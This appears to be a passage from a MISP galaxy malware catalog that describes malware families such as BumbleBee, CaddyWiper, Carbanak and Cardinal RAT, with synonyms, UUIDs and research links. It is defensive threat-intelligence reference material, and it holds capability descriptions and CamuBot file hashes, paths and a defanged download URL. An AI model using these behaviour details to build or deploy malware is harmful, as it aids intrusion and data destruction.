- https://www.welivesecurity.com/2015/04/09/operation-buhtrap/ - webarchive
- https://www.symantec.com/connect/blogs/russian-bank-employees-received-fake-job-offers-targeted-email-attack - webarchive
- https://www.welivesecurity.com/2019/07/11/buhtrap-zero-day-espionage-campaigns/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/ - webarchive
- https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/ - webarchive
- https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/ - webarchive
- https://www.scythe.io/library/threatthursday-buhtrap - webarchive
- https://dcso.de/2019/03/14/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code - webarchive
- https://malware-research.org/carbanak-source-code-leaked/ - webarchive
- https://blog.dcso.de/pegasus-buhtrap-analysis-of-the-malware-stage-based-on-the-leaked-source-code/ - webarchive
- https://www.group-ib.com/brochures/gib-buhtrap-report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BumbleBee
This malware is delivered via an ISO file containing a DLL with a custom loader. Because of the unique user-agent "bumblebee", this malware was dubbed BUMBLEBEE. At the time of analysis by Google's Threat Analysis Group (TAG), BumbleBee was observed fetching Cobalt Strike payloads.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BumbleBee.
Known Synonyms |
---|
COLDTRAIN |
SHELLSTING |
Shindig |
Internal MISP references
UUID fa47d59d-7251-468f-9d84-6e1ba21887db
which can be used as unique global reference for BumbleBee
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee - webarchive
- https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/ - webarchive
- https://www.vmray.com/cyber-security-blog/understanding-bumblebee-the-malware-configuration-and-clusters/ - webarchive
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks - webarchive
- https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664 - webarchive
- https://www.youtube.com/watch?v=JoKJNfLAc0Y - webarchive
- https://twitter.com/Intrinsec/status/1709609529070010447 - webarchive
- https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/ - webarchive
- https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf - webarchive
- https://blog.talosintelligence.com/following-the-lnk-metadata-trail - webarchive
- https://www.intrinsec.com/emotet-returns-and-deploys-loaders/ - webarchive
- https://isc.sans.edu/diary/28636 - webarchive
- https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/ - webarchive
- https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/ - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ - webarchive
- https://www.youtube.com/watch?v=pIXl79IPkLI - webarchive
- https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ - webarchive
- https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return - webarchive
- https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader - webarchive
- https://threathunt.blog/bzz-bzz-bumblebee-loader - webarchive
- https://isc.sans.edu/diary/rss/28664 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime - webarchive
- https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf - webarchive
- https://www.netskope.com/blog/new-bumblebee-loader-infection-chain-signals-possible-resurgence - webarchive
- https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056 - webarchive
- https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/ - webarchive
- https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control - webarchive
- https://twitter.com/Artilllerie/status/1701250284238823493 - webarchive
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/ - webarchive
- https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/ - webarchive
- https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/ - webarchive
- https://www.vmray.com/cyber-security-blog/understanding-bumblebee-the-malicious-behavior/ - webarchive
- https://blog.cerbero.io/?p=2617 - webarchive
- https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns - webarchive
- https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest - webarchive
- https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/ - webarchive
- https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/ - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/bumblebee-buzzes-back-black - webarchive
- https://bin.re/blog/the-dga-of-bumblebee/ - webarchive
- https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g - webarchive
- https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming - webarchive
- https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise - webarchive
- https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/ - webarchive
- https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/ - webarchive
- https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx - webarchive
- https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads - webarchive
- https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf - webarchive
- https://0xtoxin.github.io/malware%20analysis/Bumblebee-DocuSign-Campaign/ - webarchive
- https://www.vmray.com/cyber-security-blog/understanding-bumblebee-loader-the-delivery/ - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign - webarchive
- https://community.riskiq.com/article/0b211905/description - webarchive
- https://www.botconf.eu/wp-content/uploads/formidable/2/2023_4889_DESOUZA.pdf - webarchive
- https://blog.krakz.fr/articles/bumblebee/ - webarchive
- https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ - webarchive
- https://isc.sans.edu/diary/rss/28636 - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf - webarchive
- https://twitter.com/threatinsight/status/1648330456364883968 - webarchive
- https://twitter.com/ESETresearch/status/1577963080096555008 - webarchive
- https://www.europol.europa.eu/media-press/newsroom/news/largest-ever-operation-against-botnets-hits-dropper-malware-ecosystem - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/ - webarchive
- https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/ - webarchive
- https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike - webarchive
- https://twitter.com/Intrinsec/status/1699779830294970856 - webarchive
- https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bundestrojaner
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bundestrojaner.
Known Synonyms |
---|
0zapftis |
R2D2 |
Internal MISP references
UUID 04aeda9f-7923-45d1-ab74-9dddd8612d47
which can be used as unique global reference for Bundestrojaner
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BundleBot
BundleBot is an info stealer that abuses the single-file dotnet bundle format, which produces a self-contained executable that does not require any preinstalled dotnet runtime version. BundleBot's functionality targets a wide variety of data, including the victim's system information, browser data, Telegram data, Discord tokens, Facebook account information, and screenshots.
Internal MISP references
UUID d63eb20b-6a3f-4d96-a52d-8395f1868389
which can be used as unique global reference for BundleBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bunitu
Bunitu is a trojan that exposes infected computers for use as proxies by remote clients. It registers itself at startup by reporting its address and open ports. Access to Bunitu proxies is available through criminal VPN services (e.g. VIP72).
Internal MISP references
UUID 4350b52a-8100-49b5-848d-d4a4029e949d
which can be used as unique global reference for Bunitu
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu - webarchive
- http://malware-traffic-analysis.net/2017/05/09/index.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/ - webarchive
- https://broadanalysis.com/2019/04/12/rig-exploit-kit-delivers-bunitu-malware/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2015/07/revisiting-the-bunitu-trojan/ - webarchive
- https://malwarebreakdown.com/2018/03/21/fobos-malvertising-campaign-delivers-bunitu-proxy-trojan-via-rig-ek/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://zerophagemalware.com/2017/06/07/rig-ek-via-fake-eve-online-website-drops-bunitu/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BunnyLoader
Internal MISP references
UUID 051f6280-da83-4a5b-b61c-3425c9018df5
which can be used as unique global reference for BunnyLoader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Buterat
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buterat.
Known Synonyms |
---|
spyvoltar |
Internal MISP references
UUID cd4ee7f0-394e-4129-a1dc-d5fb423f2311
which can be used as unique global reference for Buterat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Buzus
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Buzus.
Known Synonyms |
---|
Yimfoca |
Internal MISP references
UUID 69a3e0ed-1727-4a9c-ae21-1e32322ede93
which can be used as unique global reference for Buzus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BYEBY
Internal MISP references
UUID 12886243-55b6-4864-bf7a-7e2439e3a4c1
which can be used as unique global reference for BYEBY
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby - webarchive
- https://unit42.paloaltonetworks.com/unit42-threat-actors-target-government-belarus-using-cmstar-trojan - webarchive
- https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia - webarchive
- https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/ - webarchive
- https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/ - webarchive
- https://decoded.avast.io/luigicamastra/apt-group-planted-backdoors-targeting-high-profile-networks-in-central-asia/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
c0d0so0
Internal MISP references
UUID b6b187d0-e19f-489a-91c0-7c94519555f6
which can be used as unique global reference for c0d0so0
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CabArt
Internal MISP references
UUID fe1d51d8-f0e8-4f71-bf5c-724f7d4a824c
which can be used as unique global reference for CabArt
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cactus
Internal MISP references
UUID 2ff26425-93b6-46ad-9c39-28eb9dbc3974
which can be used as unique global reference for Cactus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CaddyWiper
CaddyWiper is another destructive malware believed to have been deployed against targets in Ukraine.
CaddyWiper wipes all files under C:\Users and also all files on the available drives from D: to Z: by overwriting their data with NULL bytes. If a target file is larger than 0xA00000 bytes (10 MB), only its first 0xA00000 bytes are wiped.
It also wipes disk partitions from \\.\PHYSICALDRIVE9 down to \\.\PHYSICALDRIVE0 by overwriting the first 0x780 bytes of each with NULL bytes.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CaddyWiper.
Known Synonyms |
---|
KillDisk.NCX |
Internal MISP references
UUID c6053700-5f3b-48cc-8176-191393522fc3
which can be used as unique global reference for CaddyWiper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf - webarchive
- https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/ - webarchive
- https://cybersecuritynews.com/destructive-data-wiper-malware/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf - webarchive
- https://twitter.com/silascutler/status/1513870210398363651 - webarchive
- https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/ - webarchive
- https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html - webarchive
- https://cert.gov.ua/article/3718487 - webarchive
- https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html - webarchive
- https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/ - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya - webarchive
- https://n0p.me/2022/03/2022-03-26-caddywiper/ - webarchive
- https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023 - webarchive
- https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/ - webarchive
- https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd - webarchive
- https://services.google.com/fh/files/misc/apt44-unearthing-sandworm.pdf - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/ - webarchive
- https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology - webarchive
- https://cert.gov.ua/article/39518 - webarchive
- https://twitter.com/HackPatch/status/1503538555611607042 - webarchive
- https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/ - webarchive
- https://www.nioguard.com/2022/03/analysis-of-caddywiper.html - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/ - webarchive
- https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper - webarchive
- https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/ - webarchive
- https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/ - webarchive
- https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html - webarchive
- https://twitter.com/ESETresearch/status/1503436420886712321 - webarchive
- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://www.mandiant.com/resources/blog/gru-rise-telegram-minions - webarchive
- https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine - webarchive
- https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/ - webarchive
- https://www.mandiant.com/resources/blog/gru-disruptive-playbook - webarchive
- https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper - webarchive
- https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html - webarchive
- https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CadelSpy
CadelSpy is spyware believed to be used by Iranian threat actors. It has several functions, such as logging keystrokes, recording audio, capturing screenshots and webcam photos, and stealing any documents that are sent to a printer.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CadelSpy.
Known Synonyms |
---|
Cadelle |
Internal MISP references
UUID cad83c5e-2081-4ab4-81c7-32cfc16eae66
which can be used as unique global reference for CadelSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy - webarchive
- https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets - webarchive
- http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CALMTHORN
Internal MISP references
UUID 52c0b49b-d57e-400d-8808-a00d4171ac05
which can be used as unique global reference for CALMTHORN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cameleon
PwC describes this malware as a backdoor capable of file management, upload and download of files, and execution of commands.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cameleon.
Known Synonyms |
---|
StormKitty |
Internal MISP references
UUID d3fb548f-64cb-4997-8262-1dca695fbae2
which can be used as unique global reference for Cameleon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html - webarchive
- https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
campoloader
Internal MISP references
UUID 2bf8ef91-a220-49aa-a7b9-0437d2ee0b15
which can be used as unique global reference for campoloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.campoloader - webarchive
- https://blog.group-ib.com/prometheus-tds - webarchive
- https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://orangecyberdefense.com/global/blog/cybersoc/in-the-eye-of-our-cybersoc-campo-loader-analysis-and-detection-perspectives/ - webarchive
- https://unit42.paloaltonetworks.com/bazarloader-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CamuBot
There are not a lot of IOCs in this article, so we take one sample and try to extract some interesting IOCs. Our findings are below:
CamuBot sample: 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479
Dropped files on disk:
C:\Users\user~1\AppData\Local\Temp\protecao.exe: 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1
C:\Users\user~1\AppData\Local\Temp\Renci.SshNet.dll: 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8
C:\ProgramData\m.msi: AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190
Protecao.exe tries to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi
A new driver is installed: C:\Windows\system32\drivers\ftusbload2.sys: 9255E8B64FB278BC5FFE5B8F70D68AF8
ftusbload2.sys sets 28 IRP handlers.
Internal MISP references
UUID ecac83ab-cd64-4def-979a-40aeeca0400b
which can be used as unique global reference for CamuBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cannibal Rat
Cannibal Rat is a Python-written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. It is distributed in py2exe format, with python27.dll and the Python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.
Internal MISP references
UUID 1e722d81-085e-4beb-8901-aa27fe502dba
which can be used as unique global reference for Cannibal Rat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cannon
Internal MISP references
UUID 3fada5b6-0b3d-4b83-97c9-2157c959704c
which can be used as unique global reference for Cannon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cannon - webarchive
- https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/ - webarchive
- https://www.vkremez.com/2018/11/lets-learn-in-depth-on-sofacy-canon.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/fighting-ursa/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Carbanak
MyCERT states that Carbanak is a remote backdoor designed for espionage, data exfiltration, and remote control.
The attacker deploys the malware via spear-phishing emails that lure the user into opening and running the malicious attachment, which infects the machine. The main objective of this campaign is to remotely control the infected machine and gain control of internal money-processing services such as Automated Teller Machines (ATMs) and financial accounts. The malware capabilities are as follows:
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Carbanak.
Known Synonyms |
---|
Anunak |
Sekur RAT |
Internal MISP references
UUID 8c246ec4-eaa5-42c0-b137-29f28cbb6832
which can be used as unique global reference for Carbanak
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html - webarchive
- https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html - webarchive
- https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://cocomelonc.github.io/book/2023/12/13/malwild-book.html - webarchive
- https://unit42.paloaltonetworks.com/atoms/mulelibra/ - webarchive
- https://www.mandiant.com/resources/evolution-of-fin7 - webarchive
- https://threatintel.blog/OPBlueRaven-Part2/ - webarchive
- https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html - webarchive
- https://threatintel.blog/OPBlueRaven-Part1/ - webarchive
- https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-niagara - webarchive
- https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest - webarchive
- https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/ - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/ - webarchive
- https://www.mandiant.com/resources/blog/evolution-of-fin7 - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Carberp
Internal MISP references
UUID 8f0d4866-7c67-4376-a6f2-958224d3c9d0
which can be used as unique global reference for Carberp
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.carberp - webarchive
- https://cdn1.esetstatic.com/eset/US/resources/docs/white-papers/white-papers-win-32-carberp.pdf - webarchive
- https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://blog.avast.com/2013/04/08/carberp_epitaph/ - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://web.archive.org/web/20150713145858/http://www.rsaconference.com/writable/presentations/file_upload/ht-t06-dissecting-banking-trojan-carberp_copy1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cardinal RAT
Cardinal RAT is a remote access Trojan capable of stealing usernames and credentials, clearing cookies from browsers, keylogging, and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp”, which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.
Internal MISP references
UUID 3d3da4c0-004c-400c-9da6-f83fd35d907e
which can be used as unique global reference for Cardinal RAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html - webarchive
- https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html - webarchive
- https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection - webarchive
- https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html - webarchive
- https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf - webarchive
- http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412 - webarchive
- https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CargoBay
CargoBay is a newer malware family which was first observed in 2022 and is notable for being written in the Rust language. CargoBay is likely based on source code taken from the 'Black Hat Rust' GitHub project (https://github.com/skerkour/black-hat-rust). CargoBay is usually distributed via phishing emails, and the malware binaries may be disguised as legitimate applications. Upon execution, the malware starts by performing environmental checks such as checking its execution path and the configured system language. If the tests pass, the malware proceeds to gather basic system information and registers with its C2 via HTTP, from which it receives JSON-formatted jobs to carry out. CargoBay can execute commands via the command line and download additional malware binaries.
Internal MISP references
UUID cfdc931d-d3da-4b2a-9fef-42592c0f5c5f
which can be used as unique global reference for CargoBay
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CARROTBALL
CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.
Internal MISP references
UUID cca82b51-fef9-4f33-a2f5-418b80d0966d
which can be used as unique global reference for CARROTBALL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CarrotBat
Internal MISP references
UUID 4ad06a5f-12e6-44ae-9547-98ee62114357
which can be used as unique global reference for CarrotBat
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat - webarchive
- https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/ - webarchive
- https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Casper
ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.
Internal MISP references
UUID 3198501e-0ff0-43b7-96f0-321b463ab656
which can be used as unique global reference for Casper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CatB
Internal MISP references
UUID a96445d6-4bbb-4b9a-a761-83759108a403
which can be used as unique global reference for CatB
